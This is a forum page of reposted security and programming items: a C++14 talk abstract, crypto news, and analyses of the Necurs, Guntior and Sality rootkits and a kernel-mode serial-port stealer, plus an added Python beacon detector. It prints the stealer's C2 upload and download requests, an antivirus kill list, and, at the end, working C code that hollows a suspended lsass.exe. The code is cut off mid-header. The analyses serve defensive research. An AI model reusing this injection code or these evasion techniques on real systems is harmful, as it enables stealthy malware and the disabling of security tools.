Nytro

Everything posted by Nytro

  1. [h=1]C++14: Through the Looking Glass[/h]
Date: September 5, 2013, from 1:15PM to 2:30PM, Day 2, 009
Speakers: Michael Wong

“The time has come,” the ISO said,
“To talk of many things:
Of move-capture—and literals—
Of making lambdas sing—
And why deduction is so hot—
And if digits should grow wings?”

So have you heard of the next C++ Standard? No, it is not C++11. Even though C++11 has just been ratified, C++14 will likely replace C++11 by next year. By now, we have enough experience with C++11 to know where we are missing various fingers and toes, such as: Why do we not have move capture in lambdas? How about some real user-defined literal suffixes? Why did we stop with monomorphic lambdas? If lambda returns can be deduced, why not normal functions? Could we get digit separators?

C++14 will be more than a bug-fix release, and will contain some important enhancements on top of C++11. It will remove some of the major annoyances from C++11 that we already know of. But more importantly, how will this change the language, the library and some important idioms?

Source: C++14: Through the Looking Glass | GoingNative 2013 | Channel 9
  2. Silent Circle Moving Away From NIST Ciphers in Wake of NSA Revelations
by Dennis Fisher

The first major domino to fall in the crypto world after the NSA leaks by Edward Snowden began was the decision by Lavabit, a secure email provider, to shut down in August rather than comply with a government order. Shortly thereafter, Silent Circle, another provider of secure email and other services, said it was discontinuing its Silent Mail offering as well. Now, Silent Circle is going a step further, saying that it plans to replace the NIST-related cipher suites in its products with independently designed ones, not because the company distrusts NIST, but because its executives are worried about the NSA’s influence on NIST’s development of ciphers in the last couple of decades.

Jon Callas, one of the founders of Silent Circle and a respected cryptographer, said Monday that the company has been watching all of the developments and revelations coming out of the NSA leaks and has come to the decision that it’s in the best interest of the company and its customers to replace the AES cipher and the SHA-2 hash function and give customers other options. Those options, Callas said, will include non-NIST ciphers such as Twofish and Skein.

“At Silent Circle, we’ve been deciding what to do about the whole grand issue of whether the NSA has been subverting security. Despite all the fun that blogging about this has been, actions speak louder than words. Phil [Zimmermann], Mike [Janke], and I have discussed this and we feel we must do something. That something is that in the relatively near future, we will implement a non-NIST cipher suite,” Callas wrote in a blog post explaining the decision.

Twofish is a cipher suite written by Bruce Schneier and it was one of the finalists during the AES competition, but lost out to the Rijndael algorithm. It has been resistant to cryptanalysis thus far, and Callas said it also has the advantage of being an easy replacement for AES in Silent Circle’s products. The company also will be replacing SHA-2, an older NIST hash function, with Skein, which was a finalist in the recently completed SHA-3 competition.

“We are going to replace our use of the AES cipher with the Twofish cipher, as it is a drop-in replacement. We are going to replace our use of the SHA–2 hash functions with the Skein hash function. We are also examining using the Threefish cipher where that makes sense. (Full disclosure: I’m a co-author of Skein and Threefish.) Threefish is the heart of Skein, and is a tweakable, wide-block cipher. There are a lot of cool things you can do with it, but that requires some rethinking of protocols,” Callas said.

The decision by Silent Circle comes at a time when there are many unanswered questions about the NSA‘s influence on cryptographic algorithm development, specifically those standards developed by NIST. The National Institute of Standards and Technology is responsible for developing technical standards for the U.S. federal government, and many of those standards, specifically crypto standards, are adopted by other organizations. Recent revelations from the NSA leaks have shown that the NSA has some unspecified capabilities against certain crypto algorithms and also has been working to influence NIST standards development. In response to one of these revelations, NIST itself has advised people to stop using the Dual_EC_DRBG random number generator developed under its supervision.

“The DUAL_EC_DRBG discussion has been comic. The major discussion has been whether this was evil or merely stupid, and arguing the side of evil has even meant admitting it is technologically a stupid algorithm, which sends the discussion into an amusing spiral of meta-commentary,” Callas said.

Silent Circle’s move away from AES and SHA-2 shouldn’t be seen as an indictment of those two ciphers, Callas said, but more of an indication that there are better options out there without the shadow of potential NSA influence hanging over them.

“This doesn’t mean we think that AES is insecure, or SHA–2 is insecure, or even that P–384 is insecure. It doesn’t mean we think less of our friends at NIST, whom we have the utmost respect for; they are victims of the NSA’s perfidy, along with the rest of the free world. For us, the spell is broken. We’re just moving on. No kiss, no tears, no farewell souvenirs,” he said.

Source: https://threatpost.com/silent-circle-moving-away-from-nist-ciphers-in-wake-of-nsa-revelations/102452#.UkmXXBtaei8.twitter

Just a few ideas to take into consideration.
  3. [h=1]Necurs rootkit under microscope[/h]
Okay, we already know about Necurs; just a reminder of its interesting features:
- Highly difficult to remove from an infected system;
- Targets blocking the drivers of around 30 AV products [and 130 drivers in total];
- Also targets the x64 platform [has an x64 version of the driver];
- The driver has obfuscated relocatable code;
- Provides itself the earliest start in the system [before all AV or anti-malware drivers and system drivers];
- Has its own PE loader with module relocation and IAT tuning features, for creating a complete copy of the working driver;
- Three types of black list: checking version info, special code signatures and driver names.

I already wrote about detection of this rootkit by various anti-rootkits here: Security/malware blog: Necurs rootkit detection. That post also lists symptoms of infection and various kernel anomalies. Today we'll talk about Necurs in more detail.

https://twitter.com/artem_i_baranov/status/284941235934875648

First of all, the black list and how it's implemented. According to the list, which the rootkit examines, it includes about 30 various AV products (checked via version info) and 130 various drivers (checked via image name comparison). The full list of vendors is available here - Necurs targeted to prevent work products of these firms: Agnitum Ltd ALWIL S - Pastebin.com, and the list of drivers here - Necurs targeted to prevent work the following drivers: kprocesshacker.sys Vb - Pastebin.com.

https://twitter.com/artem_i_baranov/status/284309401605648387
https://twitter.com/artem_i_baranov/status/284310691366727680

Before you start the static analysis you should retrieve the decrypted version of the driver. In its normal encrypted state it looks like this:

To be convinced that the rootkit is active, you need to check for the presence of the NtSecureSys device object. The next step is to dump its decrypted body from memory with the help of an anti-rootkit or windbg. OK, let's do it with windbg.

Necurs sets some hooks in the SSDT, and this is one of the starting points for dumping its image from memory. Next we can dump it from memory. Instead of the !pool command you can search for the MZ header in reverse order to retrieve the start of the decrypted copy:

s 822bbe2b L-10000 'M' 'Z'

Decrypted driver:

The starting point of the black list checks is the LoadImageNotifyRoutine function. Detailed info about this feature: http://msdn.microsoft.com/en-us/library/windows/hardware/ff559957(v=vs.85).aspx. This callback is called every time a new driver [or user-mode image] is loaded in the system [or into a process]. This function contains all types of blacklist checks. For example, the screenshot below shows the check via vendor names in version info. If the driver is blacklisted, Necurs patches its entry point with two instructions, so that DriverEntry afterwards returns STATUS_UNSUCCESSFUL and the I/O manager does not load this driver.

The rootkit also contains two special white lists of drivers that are not included in the black list. The rootkit collects the information for the white lists at the initialization stage. It scans the \drivers directory and looks for drivers not included in the blacklist. It also walks the services registry key and adds drivers to these lists. To avoid misunderstanding: it adds loaders to these lists. The ways the driver entry points are modified look like this:

Necurs also blocks registry operations on its own service key, so any attempt to access the key fails. This is possible with the help of http://msdn.microsoft.com/ru-ru/library/windows/hardware/ff545879(v=vs.85).aspx

The situation is similar with the file system. Necurs attaches its device object to the volume and tracks all FS operations, so the rootkit body on the volume is inaccessible.

Another interesting feature of Necurs is the possibility of starting before ALL drivers in the system [including boot bus extender drivers]. But on a clean system we have another picture: OK, all right.

The conclusion is obvious: Necurs adds itself to the "Boot Bus Extender" group and modifies the priority ("Tag") of all drivers in this group (increases their Tag numbers by one, +1). For details on driver load priority, see CurrentControlSet\Services Subkey Entries.

Summary:

Necurs also registers a callback for tracking process handle creation with the help of ObRegisterCallbacks. API: http://msdn.microsoft.com/en-us/library/windows/hardware/ff558692(v=vs.85).aspx From this callback the rootkit modifies the original final desired access for the handle in special cases of handle opening. The mission of NtOpenProcessHook consists in blocking the open-handle operation for processes which the rootkit considers trusted.

According to the Microsoft Malware Protection Center (MMPC), Necurs was found on more than 83,000 machines, and the Microsoft report calls the rootkit a "prevalent threat". This is not surprising; after disclosure of the threat, it becomes clear why this is so.
http://www.darkreading.com/risk-management/167901115/security/attacks-breaches/240144203/necurs-rootkit-spreading-quickly-microsoft-warns.html
Unexpected reboot: Necurs - Microsoft Malware Protection Center - Site Home - TechNet Blogs

Fingerprints:
x32 version:
SHA256: 742a3c8c0a3601af29daffb966e947334d4f20501e5568b9c9fbf4c3526b4b84
SHA1: 30f63b8cae41a97456a82131c4577a2020697b89
MD5: 0907292986e05a8752bc1863556d229e
File size: 59776 bytes
x64 version:
SHA256: b3fea8183670ecf6150325f05aed28dfa27d7c6d2c1007808661f97c27fd7e1e
SHA1: d69b06801a8378e8c9ac8b369cb9e14ef8c8d479
MD5: 39b447e293979ac7259d4d9a2711c9a0
File size: 75720 bytes

posted by https://twitter.com/artem_i_baranov
Posted 29th December 2012 by Artem
Source: Security/malware blog: Necurs rootkit under microscope
  4. [h=1]Investigation of an interesting kernel mode stealer[/h]
https://twitter.com/artem_i_baranov/status/228409424996352001

About two weeks ago my friend R136a1 from the kernelmode forum came across a dropper that installs a driver in the system. We decided to research it, and starting the analysis was not a mistake...

Initial dropper hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes

At this moment I can say only that one or two vendors identify it as a malware family. The main purpose of the dropper is to extract the driver from itself and install it in the system. The driver is masked as a USB driver and is always extracted with the same name - usbhc.sys.

Hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes

One of the strangest things I discovered: the driver is fully standalone and does not receive commands from user mode. And of course, it does not create a device object and symbolic link for user-mode interaction. Research led me to the conclusion that the driver has one main purpose - stealing data from devices connected to the computer's serial ports and sending it to a remote server...

For stealing data from these devices it performs preparatory operations. First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM, which stores the devices attached to serial ports [devices representing serial ports]. Second, it attaches to all these devices. After the rootkit has attached its device, the device stack of the serial port looks like this:

The second very interesting thing in this case is that all network-based communication with the remote server is also found in the driver:
- DGA (Domain Generation Algorithm)
- DNS via UDP (to convert domain names into IPs)
- HTTP-based communication via TCP
- Special communication with the ndisrd.sys driver.

For retrieving domains and resolving them to IP addresses, the driver uses the following technique. First, it looks for the DhcpNameServer parameter of each interface that it finds at \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\. In the next step, it generates domains and queries the DNS service for their status. All further communication will be done through this server (which was received via DNS). All domains that it polls are listed at the end of the post.

Network communication is completely based on TDI (Transport Device Interface) [see the WDK for its description, or this tutorial: Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject]. Preparing the server connection has this form (in SDK terms - creating a socket). Next it will connect to the remote server:

Internally in the driver, the socket is described by this structure:

struct TDI_CONNECTION_INTERNAL
{
    PFILE_OBJECT foTransportAddress;
    HANDLE hTransportAddress;
    PVOID foConnection;
    HANDLE hConnection;
    ....
}

After the connection with the server is set up, it can send requests to it via HTTP. Requests look like:

GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: host
Connection: close

Simple communication with the server looks like this (rollcall):

-> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: perwadav.org
Connection: close

<- HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT
Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

SERVERISOK -> server status

After the connection is established, the driver downloads a dropper of ndisrd.sys from the server with the request:

GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1

The os_ver variable looks like n_xp_32 or n_7_32. Basic requests are formed with this function:

Conversation:

The driver saves the dropper into: \SystemRoot\System32\kb_random.exe. In my case: \SystemRoot\System32\kbVOTHBNAU.exe

From the driver:

Downloaded dropper:
SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959
MD5: a93b5454f4492a4a8d971811f2d12b1e
File size: 81805 bytes

After the dropper is downloaded, it is installed by the driver. Installation is performed in the context of a trusted process - explorer or services (depending on the OS version). The purpose of the downloaded dropper is the installation of the ndisrd.sys driver. The rootkit driver opens the ndisrd device. The purpose of the IOCTLs that the rootkit sends to NDISRD could not be identified, but here is a list of them:
830020D0
830020D4
830020D8
830020DC
830020C4

As I said before, the main purpose of the rootkit is stealing data from serial devices and sending it to the server. Stealing of data is performed by registering a completion routine in the Write and Read IRP dispatch functions. The driver registers its device in the chain of serial devices, and can see all requests that pass through the chain. The IRP_MJ_READ handler registers a completion routine and calls the next driver on the stack. The completion routine looks like this:

After data is captured, a special thread wakes up and writes the cached data to a file. The thread writes data to the file \SystemRoot\System32\svlog.log. After the data is written, the thread sets a special event signaling that data was written to the file. The thread responsible for sending data from the file to the server:

-> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: perwadav.org
Connection: close

Data of file

<- HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT
Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

SERVERISOK -> server status

Information about the malicious domain: this guy's LinkedIn profile: Nikolay Petrachkov | LinkedIn.

You can download the paper about the dropper by R136a1 here: http://artemonsecurity.com/research_of_unk_malware.pdf

posted by https://twitter.com/artem_i_baranov
Posted 26th July 2012 by Artem
Source: Security/malware blog: Investigation of an interesting kernel mode stealer
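As an added example that is not part of Artem's post: a small Python detector that flags this driver's HTTP beacons in proxy log lines, built only from the indicators the post gives (the /srv.php path with id= and mark=METKA, the f= download and a= upload variants, the fixed User-Agent, and the eight-letter .com/.org shape of the polled domains). The log layout and the sample lines are constructed for the example and are an assumption, not a format from the analysis.

```python
"""Flag the serial-port stealer's HTTP beacons in proxy log lines."""
import re
from urllib.parse import parse_qs, urlsplit

# Indicators lifted from the analysis above.
BEACON_PATH = "/srv.php"
BEACON_MARK = "METKA"
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
# Every polled domain in the post is eight lowercase letters under .com or .org.
DGA_HOST = re.compile(r"^[a-z]{8}\.(?:com|org)$")

# Constructed log layout (an assumption, not a format from the analysis):
#   client method url "user-agent" status bytes
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" (\d{3}) (\d+)$')

# Constructed sample traffic: the rollcall, the dropper download and the
# upload of captured serial data, plus two benign lines.
SAMPLE_LOG = [
    '10.0.0.5 GET http://perwadav.org/srv.php?&id=GOG73FRHOBFI&mark=METKA '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 200 20',
    '10.0.0.5 GET http://perwadav.org/srv.php?&id=GOG73FRHOBFI&mark=METKA&f=n_xp_32 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 200 81805',
    '10.0.0.5 GET http://perwadav.org/srv.php?&id=GOG73FRHOBFI&mark=METKA&a= '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 200 20',
    '10.0.0.7 GET http://example.com/srv.php?id=1&mark=OTHER "Mozilla/5.0" 200 512',
    '10.0.0.9 GET http://intranet.example.com/index.html "Mozilla/5.0" 200 4096',
]


def is_dga_host(host):
    """True when the host has the shape of the driver's generated domains."""
    return bool(DGA_HOST.match(host or ""))


def classify_request(url):
    """Map a URL to the beacon variant it matches, or None when it is not one."""
    parts = urlsplit(url)
    if parts.path != BEACON_PATH:
        return None
    # The beacon query starts with a bare '&' ("/srv.php?&id=..."); parse_qs
    # skips that empty pair, and keep_blank_values keeps the empty "a=".
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "id" not in qs or qs.get("mark") != [BEACON_MARK]:
        return None
    if "a" in qs:
        return "upload"      # captured serial data follows in the body
    if "f" in qs:
        return "download"    # fetch of the ndisrd.sys dropper for <os_ver>
    return "rollcall"


def scan_log(lines):
    """Return one finding per beacon-shaped request, in log order."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, url, ua, _status, size = m.groups()
        kind = classify_request(url)
        if kind is None:
            continue
        host = urlsplit(url).hostname
        hits.append({
            "client": client,
            "host": host,
            "kind": kind,
            "dga_host": is_dga_host(host),   # corroborating, not decisive
            "known_ua": ua == BEACON_UA,     # a real MSIE 6 UA, weak on its own
            "bytes": int(size),
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The path plus mark=METKA is the strong signal; the User-Agent is a genuine MSIE 6 string and the domain shape only corroborates.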
  5. [h=1]Guntior - detailed analysis of the Chinese bootkit[/h]
https://twitter.com/artem_i_baranov/status/225509678367506433

Original dropper that contains the bootkit dropper:
SHA1: e83ca87a39a5f15ca5942fd57d78e790861c2937
MD5: 15e692cf34a70fb364591622bff1e43a
File size: 86027 bytes

This original dropper extracts the bootkit dropper from itself and launches it with the same name.

Bootkit dropper:
SHA1: 5ecefefe4bbfc040927e827ab81c10caf5d10f90
MD5: f72e3d86b8f4f97d103ff1b7f87213f2
File size: 54272 bytes

The bootkit dropper stores its components in the resource section in encrypted state. The decryption routine looks like this:

The bootkit dropper has an interesting method of calling the OEP via an SEH handler, by generating an exception. The OEP looks like this (the dropper supports two modes of running - as a dll and as an exe).

Anti-debug/anti-emu feature:

In the next stage it performs an interesting trick to load itself as a dll and continue initialization as a dll. First, it copies itself to the system directory as random name.tmp and patches the PE characteristics by setting the Dll flag. Second, it hooks imm32.dll!ImmLoadLayout and ntdll.dll!ZwQueryValueKey. The ZwQueryValueKey hook looks like this:

After the hooks are set it tries to initiate keyboard layout switching (the layout was already registered by creating a new parameter in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts). The malicious keyboard layout looks like this:

Finally it reverts the layout to the original.

Second stage: initialization via dll loading. At this stage the dll should be loaded into the working processes in the system, and the first thing it does is set a special event to signal the bootkit exe dropper that it is running successfully. So, if injection failed, it runs the next phase. Before loading its driver, it performs some actions targeted at disabling some protections that may be present in the system:
- In the case of HintClient.exe, which belongs to the company Shanghai Hintsoft Co.,LTD. - http://www.hintsoft.com.cn/ - it sends a special IOCTL code to its driver (see code at 00403A3B).
- In the case of Drvmon (a driver monitoring tool) it also sends a special IOCTL to an unknown driver (see code at 00403B0A).

Next it loads the driver and infects the MBR.

Driver:
SHA1: adcdee632d7915f5e73669d809d9713e9250b81d
MD5: c1f5c5af49243e497ae979f2622ab5d0
File size: 4704 bytes

Features of the driver:
- Low-level disk I/O
- Process killing

It creates a device with the name \Device\Guntior for communication with ring3.

[code]
\Device\Guntior
\??\Guntior
RSDS
C:\sys.pdb
memcpy
MmMapLockedPagesSpecifyCache
memset
IoDeleteSymbolicLink
RtlInitUnicodeString
IoDeleteDevice
RtlGetVersion
IofCompleteRequest
IoCreateSymbolicLink
IoCreateDevice
PsLookupProcessByProcessId
MmIsAddressValid
ObfDereferenceObject
ObReferenceObjectByPointer
ntoskrnl.exe
WRITE_PORT_BUFFER_USHORT
HalGetBusData
READ_PORT_BUFFER_USHORT
KfRaiseIrql
KfLowerIrql
[/code]

The driver is loaded via a very interesting trick: sending a special IOCTL to the PnpManager. Unlike other bootkits that intercept functions of disk.sys or atapi.sys to hide the malicious MBR and the payload at the end of the disk, this bootkit intercepts nothing and supports unloading (it has an unload routine).

The original (not infected) MBR looks like this:

The malicious one (at offset 0x190 it stores the offset of its extension):

At the end of the disk the bootkit stores:
- The original MBR
- The extension of the malicious boot code
- The dll
- The driver

The main payload is stored in the dll [resource number 111]. The dropper extracts it from the resource, decrypts it and writes it to systemroot\system32\appmgmts.dll. It also completely overwrites systemroot\system32\sfc_os.dll with the dll body. Internally the dll is stored as a rewritten sfc_os.dll from Chinese Windows XP.

The dll is targeted at killing these processes:

[code]
nod32krn.exe egui.exe ekrn.exe 360tray.exe 360leakfixer.exe 360Safe.exe safeboxTray.exe 360safebox.exe 360sd.exe ZhuDongFangYu.exe 360rp.exe 360sdupd.exe Calc.exe KSWebShield.exe kxesapp.exe kxeserv.exe kwstray.exe kxedefend.exe upsvc.exe kxescore.exe KVExpert.exe kxetray.exe KSafeSvc.exe KSafeTray.exe guiyingfix.exe RavMonD.exe RsTray.exe RsAgent.exe RegGuide.exe RsMain.exe RsCopy.exe Rav.exe KVSrvXP.exe KVExpert.exe KVMonXp.exe avp.exe avp.exe ras.exe knownsvr.exe rstray.exe knsdtray.exe knsd.exe knsdsvc.exe knsdsve.exe QQPCLeakScan.exe QQPCWebShield.exe QQPCTAVSrv.exe QQPCRTP.exe QQPCMgr.exe QQPCUpdateAVLib.exe QQPCTray.exe QQRepair.exe QQPCPatch.exe
[/code]

Process killing code:

HTTP request:

[code]
HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: %s
Connection: Keep-Alive
[/code]

The dropper with decrypted payload is available for download here: KernelMode.info • View topic - Guntior bootkit (Chinese combine)
Dumps of the malicious code with some comments by Peter here: KernelMode.info • View topic - Guntior bootkit (Chinese combine)

posted by https://twitter.com/artem_i_baranov
Posted 18th July 2012 by Artem
Source: Security/malware blog: Guntior - detailed analysis of the Chinese bootkit
  6. [h=1]Sality rootkit analysis[/h]
Sality is a well-known family of file infectors (or PE infectors, or just viruses). As malware it has a very long history of evolution since 2003. Its latest versions contain a rootkit on board to complicate detection by AV scanners. The driver has these features:
- Process termination via NtTerminateProcess;
- Blocking access to some AV web resources via IP filtering;
- Small size, ~5 KB.

According to the analysis, the rootkit targets Windows versions from NT4 up to Vista. It should be said in advance that this rootkit is not NEW and does not contain the features that modern rootkits or bootkits have. The researched version of the rootkit has appeared ITW since the beginning of 2010.

The rootkit creates a device with the name:
\Device\amsint32
\DosDevices\amsint32
and this is a signal of infection.

The rootkit contains the usual, most famous way of process killing, which is used by almost all "old-school" rootkits.

Sality uses the old model of IP filtering to block access to web resources that belong to AV vendors. This technique is called IP Filtering. More info: Windows 2000 Filter-Hook Driver example, NT networking & kernel mode: drivers, articles, sources, and MSDN http://msdn.microsoft.com/en-us/library/windows/hardware/ff548976(v=vs.85).aspx.

List of affected vendors:

This feature requires the driver to register a callback function which will be called for IP packets. This function decides what to do with the packet: forward it or drop it. The registered callback, fnFilterHookIP, looks for the presence of AV vendor strings in the packet data. In case of a hit it forces the IP driver to drop this packet.

Encrypted AV vendor strings in its body:

Detection ratio:
SHA256: e0b193d47609c9622aa018e81da69c24b921f2ba682f3e18646a0d09ec63ac2b
SHA1: ef9a19ba89021179930888264290367b5d106a44
MD5: bf31a8d79f704f488e3dbcb6eea3b3e3
File size: 5157 bytes

posted by https://twitter.com/artem_i_baranov
Posted 15th January by Artem
Source: Security/malware blog: Sality rootkit analysis
  7. [h=2]New method of injection[/h]
[h=2]Introduction[/h]
I discovered a new method of injection (I don't know if it is really new) in a malware dropped by Duqu. So I want to share it with you and, as usual, write a p0c.

Edit: This method is not new; apparently it has been used by game cheats for years, but instead of using ZwUnmapViewOfSection they use FreeLibrary.

[h=2]Injection Method[/h]
The malware in question is simply a keylogger, but it uses a nice trick for injecting into another process. First it will create (as usual) a suspended lsass.exe process via CreateProcess(). Then it will gather process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can it do with this address? If we look at the PEB struct:

[code]
>dt nt!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged : UChar
   +0x003 SpareBool : UChar
   +0x004 Mutant : Ptr32 Void
   +0x008 ImageBaseAddress : Ptr32 Void
[/code]

It will get the ImageBaseAddress at offset 0x8, by reading it with ReadProcessMemory(). First it creates a section with ZwCreateSection(); then, in the current process (not in the suspended lsass.exe), it calls ZwMapViewOfSection() with the BaseAddress argument equal to 0, copies the old lsass.exe PE image and modifies the entry point. It will do the same operation on the lsass.exe process, but with BaseAddress equal to ImageBase. But wait! If we read the documentation of ZwMapViewOfSection, won't we get an NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES? And the answer is no, because before the second ZwMapViewOfSection it will perform ZwUnmapViewOfSection() with BaseAddress equal to ImageBaseAddress on the lsass.exe process. And if you wonder: "Wait, what!? Is that possible?", the answer is yes. With this trick the malware is able to replace the WHOLE PE image of the suspended process.

[h=2]p0c[/h]
So I decided to rewrite this trick, to understand well the stuff done by the malware (maybe you will better understand what I explained before).
Tested under Windows XP SP3 and Windows Seven SP1 (32 bits).

Main.c:

[code]
#include "main.h"

/* Read AddressOfEntryPoint out of the PE headers of a flat image copy */
int get_entrypoint(char *read_proc)
{
    IMAGE_DOS_HEADER *idh = NULL;
    IMAGE_NT_HEADERS *inh = NULL;

    idh = (IMAGE_DOS_HEADER*)read_proc;
    inh = (IMAGE_NT_HEADERS *)((BYTE*)read_proc + idh->e_lfanew);
    printf("Entrypoint = %x\n", inh->OptionalHeader.AddressOfEntryPoint);
    return (inh->OptionalHeader.AddressOfEntryPoint);
}

int main(void)
{
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    WCHAR path_lsass[260];
    PROCESS_BASIC_INFORMATION pbi;
    DWORD nb_read;
    DWORD ImageBase;
    HANDLE hsect;
    NTSTATUS stat;
    PVOID BaseAddress = NULL;
    DWORD oep;
    char read_proc[0x6000];
    LARGE_INTEGER a;
    SIZE_T size;

    memset(&si, 0, sizeof(STARTUPINFOW));
    si.cb = sizeof(STARTUPINFOW);
    memset(&pi, 0, sizeof(PROCESS_INFORMATION));
    memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION));

    ExpandEnvironmentStringsW(L"%SystemRoot%\\system32\\lsass.exe", path_lsass, 260);
    wprintf(L"[+] New Path for lsass.exe = %s\n", path_lsass);

    /* Create lsass.exe suspended: its image is mapped, but no code has run yet */
    if (!CreateProcessW(path_lsass, NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED | DETACHED_PROCESS | CREATE_NO_WINDOW,
                        NULL, NULL, &si, &pi))
    {
        printf("[-] CreateProcessW failed\n");
        printf("LastError = %x\n", GetLastError());
        return (-1);
    }

    /* Resolve the ntdll exports at runtime */
    ZwQueryInformationProcess = (long (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwQueryInformationProcess");
    ZwMapViewOfSection = (long (__stdcall *)(HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
    ZwUnmapViewOfSection = (long (__stdcall *)(HANDLE, PVOID))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
    ZwCreateSection = (long (__stdcall *)(PHANDLE, ACCESS_MASK, PDWORD, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
    if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL ||
        ZwUnmapViewOfSection == NULL || ZwCreateSection == NULL)
    {
        printf("[-] GetProcAddress failed\n");
        return (-1);
    }

    /* ProcessBasicInformation (class 0) gives us PebBaseAddress */
    if (ZwQueryInformationProcess(pi.hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0)
    {
        printf("[-] ZwQueryInformationProcess failed\n");
        return (-1);
    }
    printf("[+] UniqueProcessID = 0x%x\n", pbi.UniqueProcessId);

    /* PEB+0x8 is ImageBaseAddress (see the dt output above) */
    if (!ReadProcessMemory(pi.hProcess, (BYTE*)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) || nb_read != 4)
    {
        printf("[-] ReadProcessMemory failed\n");
        return (-1);
    }
    printf("[+] ImageBase = 0x%x\n", ImageBase);

    /* Copy the first 0x6000 bytes of the mapped lsass.exe image */
    if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x6000, &nb_read) || nb_read != 0x6000)
    {
        printf("[-] ReadProcessMemory failed\n");
        return (-1);
    }
    printf("(dbg) Two first bytes : %c%c\n", read_proc[0], read_proc[1]);
    oep = get_entrypoint(read_proc);

    /* Pagefile-backed section that will hold the replacement image */
    a.HighPart = 0;
    a.LowPart = 0x8EF6;
    if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
    {
        printf("[-] ZwCreateSection failed\n");
        printf("[-] NTSTATUS = %x\n", stat);
        return (-1);
    }

    /* Map the section in our own process (BaseAddress == 0: anywhere) */
    size = 0x8000;
    BaseAddress = (PVOID)0;
    if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, 0, 0, NULL, &size, 1 /* ViewShare */, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
    {
        printf("[-] ZwMapViewOfSection failed\n");
        printf("[-] NTSTATUS = %x\n", stat);
        return (-1);
    }

    /* Put an INT3 at the entry point and fill the shared view with the image */
    memset((BYTE*)read_proc + oep, 0xCC, 1);
    memcpy(BaseAddress, read_proc, 0x2000);

    /* Unmap the original image in lsass.exe and map our view at the same base */
    BaseAddress = (PVOID)ImageBase;
    printf("BaseAddress = %x\n", BaseAddress);
    ZwUnmapViewOfSection(pi.hProcess, BaseAddress);
    if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, 0, 0, NULL, &size, 1 /* ViewShare */, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
    {
        printf("[-] ZwMapViewOfSection failed\n");
        printf("[-] NTSTATUS = %x\n", stat);
        system("pause");
        return (-1);
    }
    printf("BaseAddress = %x\n", BaseAddress);

    ResumeThread(pi.hThread);
    system("pause");
    return (0);
}
[/code]

And the include file (main.h):

[code]
#include <stdio.h>
#include <Windows.h>

#if !defined NTSTATUS
typedef LONG NTSTATUS, *PNTSTATUS;
#endif

#define STATUS_SUCCESS 0

